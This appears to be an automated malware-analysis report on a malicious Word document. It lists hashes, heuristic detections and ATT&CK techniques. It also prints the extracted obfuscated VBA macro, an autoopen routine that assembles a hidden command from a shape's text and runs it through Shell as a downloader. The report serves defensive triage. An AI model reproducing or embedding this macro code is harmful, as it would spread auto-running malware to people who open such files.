Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 66055ec57096d487…

MALICIOUS

Office (OLE)

144.6 KB Created: 2018-12-11 11:28:00 Authoring application: Microsoft Office Word First seen: 2019-04-18
MD5: e8cb64f17f65e93fede0c1d40c344d4a SHA-1: 0840d1b2f41ddb4e1fcc95ad9ba99df9ef8320af SHA-256: 66055ec57096d4875bca296136902ad9f06b2affc050ba64e2358f6308178425
252 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample contains a legacy WordBasic auto-exec macro (autoopen) that triggers a critical VBA Shell() call. This call is used to invoke cmd.exe with execution flags, indicating an attempt to download and execute a second-stage payload. The obfuscated command line suggests a downloader functionality.

Heuristics 9

  • ClamAV: Doc.Downloader.Generic-6780294-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Generic-6780294-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
     _
.Shell(XZBqET, lIRVsT), Vcpozp)
   sEcQzmzZwcmSCfN = (248683754 + Round(LfCtBODiPlzwEBOpJ) * 13206318 - RQArNQGtiNcHYUDAoXNrq + (hiBAdrbXdsddTALopcv / Tan(UVmdbbABaRwKutiSqM)))
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Attribute VB_Customizable = True
Sub autoopen()
EhWwFkSDK
  • Suspicious cmd.exe invocation with execution flag high SC_STR_CMD
    Suspicious cmd.exe invocation with execution flag
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5429 bytes
SHA-256: 0e515f2af1343cb5843f3a08613b34a3c24863a86a31875748708d7fd6aa6b32
Detection
ClamAV: No threats found
Obfuscation or payload: likely
161 of 193 identifiers look randomly generated (e.g. 'sKrzhDzisatEspOsqowFQzsK') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "tLjKSjrzwMCj"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub autoopen()
EhWwFkSDK
End Sub

Attribute VB_Name = "ABSjSLjuiiD"
Function EhWwFkSDK()
On Error Resume Next
   sqtkiCLKWNMtldTIW = (261167220 + Round(mZukdkpsRunaSSWj) * 55488997 - sKrzhDzisatEspOsqowFQzsK + (QimtbOzLJicUpsqlwrOzMBw / Tan(abihCisShCRUMlRM)))
tjKlXBwHUSHdKiPkaSzjQIbl = 70969572
   paLAWQSZlnuIWXhJOzTLQpm = (63336902 + Round(MOEEolCskqKzYE) * 124432982 - wzILYEjiohzwOizoBzJCNUzB + (QlhWLpvAOTpdziIfWQGmGiF / Tan(VvbuQjbCHTISCLcrEvzLKLD)))
BWrEqPlmfqBQOAjfr = 255658383
   afkWDVdSdwsnfQLRoIdG = (36327502 + Round(iXaJqzUwIkhKHdLH) * 36906287 - zPTdOqzXtEiHqjYQ + (MvtiizjpHFVJiFhDQIpqFIkK / Tan(GQSBuwlqjzLMhTSnnH)))
dNKwwEabjaqDLjKYjOoNH = 239357612
   LiVfTFRfwociJpQj = (63327051 + Round(YwwaqOOfdsnHGORtGwIsNOjW) * 311832708 - DKTajOaQmXQkoHQo + (ZrphORQjTXRmJMafjLE / Tan(CIZjqbtcVHBbZnJi)))
cpsCrPqJicKqFHv = 80636102
   RFHvfDZASPXjljnpAz = (82026665 + Round(ZQJKibTTsuhpOBttb) * 285014021 - wjPiwUcLEPdOjqEvBvwMD + (FHYhiVkmtOJMQiKlLqFQP / Tan(OfAwJGswiihMbH)))
QmHbRWOEUaVlPkG = 42067056
   pWOjjoDIwWSsRAKYHQh = (88403715 + Round(kLhnSMACqZHWBqB) * 165268538 - tZUQvVIWvhsXqHtQTEKhvQ + (CFIwKWPJIzUXItpppYR / Tan(iIfzSOFhmrrqcwRLmZ)))
zjYjXVjlXdOUIitzuaIiwRiX = 115867905
   lizKbJVRMhALHkKHOBB = (131328283 + Round(YvWjzwLiwIcjoqDdwKAUHs) * 172808105 - bNpSnkBPjpNibdcMKnPYXi + (uHiRrBzffVhElGsqL / Tan(MAwdUBShnKTdBRw)))
vKJTKOhKiMtYqFSwDQKiTQn = 186843198
Const lIRVsT = 0
   UkMVtGdjNzpiAbwhZVj = (222851948 + Round(jJONCwwDLudtiWvK) * 164242524 - kQhqnASXpwPhjqSLkbwHrHic + (CMoSFDXAXvRfsW / Tan(viJCndNmbXlTMRGc)))
EokodFjsshJuAfsFkMMzc = 268377615
   tckhmEaWiiXoWLnrK = (7670103 + Round(KCNzMQFmEuQLGHrWo) * 69528091 - iGplzTVnwtBcAsXNPfiYR + (RVcRTQhfowjcWJUQOird / Tan(sDRQSitbqKmQwoU)))
hAEFTFDvYWOtzRzh = 262639789
   slWuQnmRoJENnbYcpkzFzHz = (192703200 + Round(EWikUjzaGjnoKLkck) * 74926289 - vJiokmMbwnvlltfLRH + (TdHmjskoiYPcNwciFaiuw / Tan(EwmKzCuiASVDrtn)))
zvAzhDiLipILZljMjL = 160266069
   LLEtZVZjtGGrmuDmE = (77192338 + Round(BwjIBSwAizTAWsZdN) * 289665187 - miIdJkPbsAPwZod + (TiDCbaVqjZFjwNRpuw / Tan(jtUXYlrGzTCtLtWFwKp)))
MMRujijcfjZCbPtcwHiR = 237122864
Set WvhuAYzHJ = tLjKSjrzwMCj.Shapes(OiIUj + "UUCYusK" + dWbASDh)
   tmVXFjMLziIKpmtAPAqO = (132549628 + Round(jEcHDdPjNSYwDFBGSTKIUjw) * 179719313 - zBwUwqwJBGQuzf + (vSRpmqinzJhXELXwHBFEc / Tan(MPcZoBzkLVnbNBSHp)))
QNwKQTuwiJJtsaGi = 35438124
   otjbfrPWtHdnAScdvUHCTHw = (10254221 + Round(MFDXCIsEEbjHzrHrVlQCwDE) * 109632978 - czzBXjwijSmLwq + (kivqsWvdALzWjzvJBmVaLuDh / Tan(mZSZVfXuRRQHNXfhTzqZJQjk)))
kZdQoqfOuGwcDff = 175600657
   jzlFuIVzHobiBJFUodJ = (262446022 + Round(HFjiSmKjbKcXlShPvKzbMfjV) * 93029600 - zCQSRdGdZtFXcWKQf + (wHPrYEsSLMibVKUBpHQJ / Tan(zQItnKYibQvAFXGAGiMZzRu)))
zYvCahDAVlwqHwktUjkvmbQ = 253325449
   LDDEhLJwoijWHPYMHjlFoio = (305370926 + Round(MpOJSkfbcXtNovzZbvi) * 136651499 - LlkTBwLfDcOIfUWv + (WtDvirfwSnojMnFZMBEipQ / Tan(UvZuiEJaadmZoRRhtEUjKX)))
qpIjSTRRzFHjAEzBtIMNDaNR = 56571788
XZBqET = WvhuAYzHJ.TextFrame.TextRange + PVIuNv + cDjthWO + YQtHtS + jwHWHI + CVizbqir + zawlsR + NwHbjlii + GZHGfi + GnqPPZLv + wsbHwzF + dOYTstw + WrLHNQ + VFzHW
   coOfjuAfkOqoMrGVFXQXzUD = (298129093 + Round(tmapbIwtloBhlvot) * 31947602 - obrSdXEzBoBwHkVSnHZpJGu + (aCFnTbbiscPRVaJDkiGIsojQ / Tan(THhTOihhwraRQdaM)))
DfVDwMzVEiAmDlWobz = 129164086
   YKNTrzpfdjIiWZdKKQHq = (332912944 + Round(VNZZNEMEhjXBiHwGt) * 264600633 - sAhbFIuMWqEmbiHozuSm + (TZwZHUrWMEXSNFRomTQSr / Tan(OcwvXaTwLbCrZajBwnDqKl)))
TNYpANbBTuiKVcLzQCOsw = 110938766
   sCjJPDoIVsqATDHYsJTV = (39638476 + Round(nTwzcmSZzjmHOwVOdq) * 135301054 - TOGhSJznhvHJXYPQ + (RaCpvtGOMoIDdjcA / Tan(AYMRiSoisDbckqjEDLQSXXV)))
TGVpkDPiIiYrDunHNKDqflcw = 163171824
   QWjjzRzEiIIXsQtajHMui = (307434409 + Round(WDKMHwqwGdlQIqjpKwOvAnQz) * 211725139 - jiJAHEWYKdmFqFnLBu + (zlkASBzQzwjmNjl / Tan(MnFVhujfFDFGIHolV)))
jlwirzJoWcbqZYEqbYvZZEB = 32043872
   OwuuBilvMoTiGVu = (39953346 + Round(OaCqlNRwrBGSiSRCiau) * 104129387 - fiwctzczLslWtmf + (RcldwJhiciVCcYuAq / Tan(jvFOsOozjJVwkjmlQz)))
mJWzSzKdZWmzljY = 17344642
   cNpmXoDlZUjMaQlKNPujEGw = (133178408 + Round(ivUwEzOKoowoPEYJAY) * 286719469 - NiCbiwPkRpVPVPss + (oUXUBlbnVzLVZEiHKJwss / Tan(HhitwSjTALjaLDUpM)))
aoIzEOrlnHKFwzqWNppHnJEB = 325914513
   WiZkarLjmcMhiJZ = (285115271 + Round(lXGfBfDvhnYIsHE) * 124955353 - PURHYDSWmahRzQamrtMWc + (CWotEmatVIOzuEZzMU / Tan(JPEVihWwWBNswIuSvSfwfv)))
FZDCVVMrhriTFwAKMhoDrIQ = 123229939
   sibPEALSjZOFTUUC = (255998336 + Round(SfucwjfpiFUqXmjfzTVtfMK) * 102138091 - klPFlOwRtOCQQjujPRFztCbW + (VBjtLFUfiNvQjwqYYiXhOj / Tan(aKQuEREiJtRQNQYiJhlmV)))
TfVPZVYEoZmRFiuKQNZfmWSj = 190158521
vOzczPbqk = Array(orjKEEs, wKpnwRY, pNwNom, Interaction _
 _
 _
 _
 _
 _
 _
 _
.Shell(XZBqET, lIRVsT), Vcpozp)
   sEcQzmzZwcmSCfN = (248683754 + Round(LfCtBODiPlzwEBOpJ) * 13206318 - RQArNQGtiNcHYUDAoXNrq + (hiBAdrbXdsddTALopcv / Tan(UVmdbbABaRwKutiSqM)))
OSLkkduACpAikvVDMvXZBq = 170621595
   XsasOWcjDKlvVfpDIJuMOoV = (9279160 + Round(OYdQAFuvivuLfirw) * 29670323 - AooaWQrGKzOiiXZ + (zwwSDFqArjvsciCQJjVN / Tan(nBNZtuvhzNWmBitzlEu)))
ojmVzifwzUBCLFLwltJLvSrW = 160925081
End Function

Open this report in the interactive analyzer, or submit your own file for analysis.